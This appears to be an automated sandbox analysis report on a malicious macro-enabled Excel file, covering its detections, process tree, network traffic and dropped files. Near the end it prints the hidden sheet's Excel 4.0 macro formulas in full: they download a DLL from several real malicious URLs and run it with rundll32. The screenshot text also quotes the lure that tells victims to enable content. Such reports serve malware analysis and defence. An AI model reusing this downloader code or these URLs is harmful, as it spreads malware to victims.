
Windows Analysis Report
INFO 02022022.xlsm

Overview

General Information

Sample Name: INFO 02022022.xlsm
Analysis ID: 566383
MD5: 09fc9d460b0b4894badbd711adf6e80d
SHA1: 944d23b8a649430a40458071c4b3780d9a4f5801
SHA256: 249f772d85dd7c9ab127a05ba592f5b2cc68ddd805b62c97864b87210558b729

Detection

Hidden Macro 4.0
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Excel Network Connections
Excel document contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 1484 cmdline: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r MD5: 51138BEEA3E2C21EC44D0932C71762A8)
No configs have been found
Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

    System Summary

    Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2428, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r, ProcessId: 1484
    Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0'; Data: DestinationIp: 190.92.141.240, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2428, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2428, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

    AV Detection

    Source: INFO 02022022.xlsm; Virustotal: Detection: 32%
    Source: INFO 02022022.xlsm; ReversingLabs: Detection: 66%
    Source: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi; Avira URL Cloud: Label: malware
    Source: https://burialinsurancelab.com/q5kje9/K1mF/; Avira URL Cloud: Label: malware
    Source: burialinsurancelab.com; Virustotal: Detection: 11%
    Source: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi; Virustotal: Detection: 12%
    Source: https://burialinsurancelab.com/q5kje9/K1mF/; Virustotal: Detection: 15%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: unknown; HTTPS traffic detected: 190.92.141.240:443 -> 192.168.2.22:49165 version: TLS 1.2

    Software Vulnerabilities

    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 190.92.141.240:443
    Source: global traffic; DNS query: name: burialinsurancelab.com
    Source: global traffic; HTTP traffic detected: GET /q5kje9/K1mF/ HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: burialinsurancelab.com
        Connection: Keep-Alive
    Source: global traffic; HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: burialinsurancelab.com
        Connection: Keep-Alive
    Source: Joe Sandbox View; ASN Name: DesarrollosDigitalesdePulsarConsultingAR DesarrollosDigitalesdePulsarConsultingAR
    Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknown; Network traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknown; Network traffic detected: HTTP traffic on port 49166 -> 443
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\126B0B6.jpg
    Source: unknown; DNS traffic detected: queries for: burialinsurancelab.com

    System Summary

    Source: Screenshot number: 4; Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 4; Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 4; Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 RunDLL |~| 17 18 19 Therewasa pro
    Source: INFO 02022022.xlsm; Macro extractor: Sheet: EFEWFWXV contains: URLDownloadToFileA
    Source: INFO 02022022.xlsm; Initial sample: EXEC
    Source: INFO 02022022.xlsm; Macro extractor: Sheet name: EFEWFWXV
    Source: workbook.xml; Binary string:
    <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2">
      <fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22527"/>
      <workbookPr defaultThemeVersion="166925"/>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
        <mc:Choice Requires="x15">
          <x15ac:absPath url="C:\Users\Admin\Desktop\File\2f\Cir\ZV\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/>
        </mc:Choice>
      </mc:AlternateContent>
      <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E9185827-836F-473E-8AEC-6E4E5044F488}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
      <bookViews>
        <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
      </bookViews>
      <sheets>
        <sheet name="Sheet" sheetId="1" r:id="rId1"/>
        <sheet name="Gfefq1" sheetId="2" state="hidden" r:id="rId2"/>
        <sheet name="EbrbwQ1" sheetId="3" state="hidden" r:id="rId3"/>
        <sheet name="EbrbwQ2" sheetId="5" state="hidden" r:id="rId4"/>
        <sheet name="EFEWFWXV" sheetId="4" state="hidden" r:id="rId5"/>
      </sheets>
      <definedNames>
        <definedName name="KKLD">EFEWFWXV!$C$15</definedName>
        <definedName name="KKLD1">EFEWFWXV!$C$17</definedName>
        <definedName name="KKLD2">EFEWFWXV!$C$19</definedName>
        <definedName name="KKLD3">EFEWFWXV!$C$21</definedName>
        <definedName name="KKLD4">EFEWFWXV!$C$23</definedName>
        <definedName name="KKLD8">EFEWFWXV!$C$9</definedName>
        <definedName name="_xlnm.Auto_Open">EFEWFWXV!$C$1</definedName>
      </definedNames>
      <calcPr calcId="191029"/>
      <extLst>
        <ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main">
          <x15:workbookPr chartTrackingRefBase="1"/>
        </ext>
        <ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures">
          <xcalcf:calcFeatures>
            <xcalcf:feature name="microsoft.com:RD"/>
            <xcalcf:feature name="microsoft.com:FV"/>
          </xcalcf:calcFeatures>
        </ext>
      </extLst>
    </workbook>
    Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76F90000 page execute and read and write
    Source: C:\Windows\SysWOW64\rundll32.exe; Memory allocated: 76E90000 page execute and read and write
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r
    Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$INFO 02022022.xlsm
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmp
    Source: classification engine; Classification label: mal96.expl.evad.winXLSM@3/4@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
    Source: Window Recorder; Window detected: More than 3 window changes detected
    Source: INFO 02022022.xlsm; Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: INFO 02022022.xlsm; Initial sample: OLE zip file path = xl/media/image1.jpg
    Source: INFO 02022022.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: INFO 02022022.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet4.xml.rels
    Source: INFO 02022022.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: INFO 02022022.xlsm; Initial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (8 occurrences)
    Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
    Source: Yara match; File source: app.xml, type: SAMPLE
    Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts
    Execution: 21 Scripting | 23 Exploitation for Client Execution | At (Linux) | At (Windows) | Cron
    Persistence: Path Interception | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac) | Network Logon Script
    Privilege Escalation: 1 Process Injection | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac) | Network Logon Script
    Defense Evasion: 1 Masquerading | 1 Disable or Modify Tools | 1 Rundll32 | 1 Process Injection | 21 Scripting
    Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets
    Discovery: 1 File and Directory Discovery | 2 System Information Discovery | Query Registry | System Network Configuration Discovery | Remote System Discovery
    Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH
    Collection: Data from Local System | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging
    Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Scheduled Transfer | Data Transfer Size Limits
    Command and Control: 1 Encrypted Channel | 2 Non-Application Layer Protocol | 13 Application Layer Protocol | 2 Ingress Tool Transfer | Fallback Channels
    Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS | Exploit SS7 to Track Device Location | SIM Card Swap | Manipulate Device Communication
    Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization | Obtain Device Cloud Backups | Carrier Billing Fraud | Manipulate App Store Rankings or Ratings
    Impact: Modify System Partition | Device Lockout | Delete Device Data
    Source | Detection | Scanner | Label
    INFO 02022022.xlsm | 32% | Virustotal |
    INFO 02022022.xlsm | 67% | ReversingLabs | Document-Office.Downloader.EncDoc
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    burialinsurancelab.com | 12% | Virustotal |
    Source | Detection | Scanner | Label
    https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi | 13% | Virustotal |
    https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi | 100% | Avira URL Cloud | malware
    https://burialinsurancelab.com/q5kje9/K1mF/ | 15% | Virustotal |
    https://burialinsurancelab.com/q5kje9/K1mF/ | 100% | Avira URL Cloud | malware
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    burialinsurancelab.com | 190.92.141.240 | true | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi | true | 13% Virustotal; Avira URL Cloud: malware | unknown
    https://burialinsurancelab.com/q5kje9/K1mF/ | true | 15% Virustotal; Avira URL Cloud: malware | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    190.92.141.240 | burialinsurancelab.com | Argentina | 10986 | DesarrollosDigitalesdePulsarConsultingAR | true
    Joe Sandbox Version: 34.0.0 Boulder Opal
    Analysis ID: 566383
    Start date: 04.02.2022
    Start time: 11:16:30
    Joe Sandbox Product: CloudBasic
    Overall analysis duration: 0h 4m 25s
    Hypervisor based Inspection enabled: false
    Report type: full
    Sample file name: INFO 02022022.xlsm
    Cookbook file name: defaultwindowsofficecookbook.jbs
    Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of new started processes analysed: 6
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Detection: MAL
    Classification: mal96.expl.evad.winXLSM@3/4@1/1
    EGA Information: Failed
    HDC Information: Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
    No simulations
    Match | Associated Sample Name / URL | Detection | Context
    190.92.141.240
    • fichier 5266183.xlsm; malicious
    • fichier 5266183.xlsm; malicious
    Match | Associated Sample Name / URL | Detection | Context
    Match | Associated Sample Name / URL | Detection | Context
    DesarrollosDigitalesdePulsarConsultingAR
    • fichier 5266183.xlsm; malicious; 190.92.141.240
    • fichier 5266183.xlsm; malicious; 190.92.141.240
    • phantom.arm7; malicious; 200.69.26.157
    • URGENT_ORDER.exe; malicious; 190.92.152.94
    • sora.arm; malicious; 200.69.26.159
    • FftiBztA3n; malicious; 190.92.170.250
    • TFiqcmldz5; malicious; 200.69.26.199
    • qYPsFsdb1K; malicious; 200.69.26.179
    • sora.arm; malicious; 190.92.204.168
    • Jp0fvo75qa; malicious; 190.92.204.178
    Match | Associated Sample Name / URL | Detection | Context
    7dcce5b76c8b17472d024758970a406b
    • New Order.ppam; malicious; 190.92.141.240
    • DHL.ppam; malicious; 190.92.141.240
    • Specification Sheet .ppam; malicious; 190.92.141.240
    • copyTT.ppam; malicious; 190.92.141.240
    • PO 85251532 65451562.ppam; malicious; 190.92.141.240
    • Factura de proforma 3092222.ppam; malicious; 190.92.141.240
    • RK-289902298.xlsb; malicious; 190.92.141.240
    • RK-1457693149.xlsb; malicious; 190.92.141.240
    • PO.ppam; malicious; 190.92.141.240
    • Payment copy.ppa; malicious; 190.92.141.240
    • Payment Order.ppsx; malicious; 190.92.141.240
    • 718921233926305733025810553.xls; malicious; 190.92.141.240
    • Order 124020222.xlsx; malicious; 190.92.141.240
    • PO_000105.ppam; malicious; 190.92.141.240
    • 6 (2).ppam; malicious; 190.92.141.240
    • Contract Agreement Signed.ppa; malicious; 190.92.141.240
    • fichier 5266183.xlsm; malicious; 190.92.141.240
    • Odeme.xls; malicious; 190.92.141.240
    • 1E40A77A.xlsb; malicious; 190.92.141.240
    • BF-1615471352.xlsb; malicious; 190.92.141.240
    No context
        Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type: HTML document, ASCII text
        Category: downloaded
        Size (bytes): 605
        Entropy (8bit): 5.084738390668529
        Encrypted: false
        SSDEEP: 12:AgHFQww5sX//JZdTCw9UqbA6+6ZzufIPKdXsJ4AHbhBFpX9a/gqtPCtyHB2oQL:FlQv5sXJZRagdpKlsJVHVDpX9yOSB2D
        MD5: 9716835EE556BAA1201D200BDAB6ED5A
        SHA1: 50444B41FF47B9E83A8B2928B47EF9A7924540E4
        SHA-256: 9D87C6086A4EF9B547CBE9BD6B57C0C259410E3BF15D9BC1CC676F9C2D0DB7B1
        SHA-512: D121E229C014491CB1FA48CB3A7EA713D84ED15693D84224C7DA8BBB3F6075BA23A7EC1AA37599E17300A4639F182C41CE5F4E5EBE5C081D0BEE1BF6C73536FE
        Malicious: false
        Reputation: moderate, very likely benign file
        IE Cache URL: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi
        Preview:<html>.<head>..<title></title>..<style type="text/css">.. ...body {....margin-top: 20px;....text-align: center;....font-family: Tahoma, Arial, Helvetica, sans-serif;....font-size: 14px;....color: #111111;...}...h1 {....font-size: 20px;....margin-bottom: 4px;...}...div.gbr {....margin: 20px auto 0px auto;....width: 450px;....border: 1px solid #C1E0BF;....padding: 6px;...}..-->..</style>.</head>..<body>..<h1>This page is currently unavailable</h1>.<div class="gbr">..If you are the webmaster for this site, please contact your hosting provider's support team for assistance..</div>...</body>.</html>.
        Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1360x191, frames 3
        Category: dropped
        Size (bytes): 84867
        Entropy (8bit): 7.954742205628136
        Encrypted: false
        SSDEEP: 1536:jp20B+axURtKckrr9qZGrhD1GW+wZk4lHpuaI4qO:jHHxutKckrpqZGh+wrlJuaIjO
        MD5: FAD556093558C6609047F5662E77A074
        SHA1: 8BE0B83C07D0B6C74A56114CC024C32CE877A8E6
        SHA-256: 52B19EE1F2563496B0DA0CFDF7C3E12BD7C045B5E88AEAEFCDAC490C944BB59B
        SHA-512: 08F003FD5CFCB0C173770C227E34E02DD1C126E58378679B6647D97C6B1841A8594D542CC043D3CC41E9A28E951F1533F05FD355A6E2EC7EC002662EC416CFDA
        Malicious: false
        Reputation: low
        Preview:......JFIF.............C....................................................................C.........................................................................P............................................P............................!.1.."A.2Qaq#B.3R.....$%Cb&4Srsv..789c...DEVu....................................I......................!..1AQa...."q...2R..#Br...3b..$....45s..CScD................?..3.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q.....?.'z8.q..D\.8..D.O...."..
        Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type: data
        Category: dropped
        Size (bytes): 165
        Entropy (8bit): 1.4377382811115937
        Encrypted: false
        SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
        MD5: 797869BB881CFBCDAC2064F92B26E46F
        SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
        SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
        SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
        Malicious: true
        Reputation: high, very likely benign file
        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type: HTML document, ASCII text
        Category: dropped
        Size (bytes): 605
        Entropy (8bit): 5.084738390668529
        Encrypted: false
        SSDEEP: 12:AgHFQww5sX//JZdTCw9UqbA6+6ZzufIPKdXsJ4AHbhBFpX9a/gqtPCtyHB2oQL:FlQv5sXJZRagdpKlsJVHVDpX9yOSB2D
        MD5: 9716835EE556BAA1201D200BDAB6ED5A
        SHA1: 50444B41FF47B9E83A8B2928B47EF9A7924540E4
        SHA-256: 9D87C6086A4EF9B547CBE9BD6B57C0C259410E3BF15D9BC1CC676F9C2D0DB7B1
        SHA-512: D121E229C014491CB1FA48CB3A7EA713D84ED15693D84224C7DA8BBB3F6075BA23A7EC1AA37599E17300A4639F182C41CE5F4E5EBE5C081D0BEE1BF6C73536FE
        Malicious: false
        Reputation: moderate, very likely benign file
        Preview:<html>.<head>..<title></title>..<style type="text/css">.. ...body {....margin-top: 20px;....text-align: center;....font-family: Tahoma, Arial, Helvetica, sans-serif;....font-size: 14px;....color: #111111;...}...h1 {....font-size: 20px;....margin-bottom: 4px;...}...div.gbr {....margin: 20px auto 0px auto;....width: 450px;....border: 1px solid #C1E0BF;....padding: 6px;...}..-->..</style>.</head>..<body>..<h1>This page is currently unavailable</h1>.<div class="gbr">..If you are the webmaster for this site, please contact your hosting provider's support team for assistance..</div>...</body>.</html>.
        File type: Microsoft Excel 2007+
        Entropy (8bit): 7.904718911000883
        TrID:
        • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
        • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
        • ZIP compressed archive (8000/1) 8.08%
        File name: INFO 02022022.xlsm
        File size: 102421
        MD5: 09fc9d460b0b4894badbd711adf6e80d
        SHA1: 944d23b8a649430a40458071c4b3780d9a4f5801
        SHA256: 249f772d85dd7c9ab127a05ba592f5b2cc68ddd805b62c97864b87210558b729
        SHA512: 8f0c70bdd0b9c90419da5ae89a9752c9255071eb116287f52c35ccb63213d55010e317e4c04dcb63de6562a1746e88829a0de8a0bd32d2dd04c7abd2b5541ed9
        SSDEEP: 1536:3PkrrXjl7p20B+axURtKckrr9qZGrhD1GW+wZk4lHpuaI4q7VGFHl:/kHjl7HHxutKckrpqZGh+wrlJuaIjcFF
        File Content Preview:PK..........!.s.R..... .......[Content_Types].xml ...(.........................................................................................................................................................................................................
        Icon Hash: e4e2aa8aa4bcbcac
        Document Type: OpenXML
        Number of OLE Files: 1
        Has Summary Info:
        Application Name:
        Encrypted Document:
        Contains Word Document Stream:
        Contains Workbook/Book Stream:
        Contains PowerPoint Document Stream:
        Contains Visio Document Stream:
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:
        Name: EFEWFWXV
        Type: 4
        Final: False
        Visible: False
        Protected: False
        EFEWFWXV | 4 | False | 0 | False | pre
        Cells (row, column, content):
        5, 2, =FORMULA("DllRegisterServer",KKLD8)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://burialinsurancelab.com/q5kje9/K1mF/","..\iix.ocx",0,0)",C15)=FORMULA("=IF(KKLD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lealracecars.com/donnacox/fVqOYBzAUoU/","..\iix.ocx",0,0))",C17)=FORMULA("=IF(KKLD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/","..\iix.ocx",0,0))",C19)=FORMULA("=IF(KKLD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/","..\iix.ocx",0,0))",C21)=FORMULA("=IF(KKLD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/","..\iix.ocx",0,0))",C23)=FORMULA("=IF(KKLD4<0, CLOSE(0),)",C25)=FORMULA("=EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,"&KKLD8)",C27)
        30, 2, =RETURN()
        EFEWFWXV | 4 | False | 0 | False | post
        Cells (row, column, content):
        5, 2, =FORMULA("DllRegisterServer",KKLD8)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://burialinsurancelab.com/q5kje9/K1mF/","..\iix.ocx",0,0)",C15)=FORMULA("=IF(KKLD<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lealracecars.com/donnacox/fVqOYBzAUoU/","..\iix.ocx",0,0))",C17)=FORMULA("=IF(KKLD1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://edgetactical.ritabilisim.com/admin/2jKBEGDY0XpcgxF7f/","..\iix.ocx",0,0))",C19)=FORMULA("=IF(KKLD2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://4seasonsflorals.com/yhedjkl/BYwyXorqDywx/","..\iix.ocx",0,0))",C21)=FORMULA("=IF(KKLD3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://boldconsulting.info/bkzh6v/eqbAgc3oMGBsC5VDn1w/","..\iix.ocx",0,0))",C23)=FORMULA("=IF(KKLD4<0, CLOSE(0),)",C25)=FORMULA("=EXEC("C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,"&KKLD8)",C27)
        8, 2, DllRegisterServer
        14, 2, =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://burialinsurancelab.com/q5kje9/K1mF/","..\iix.ocx",0,0)
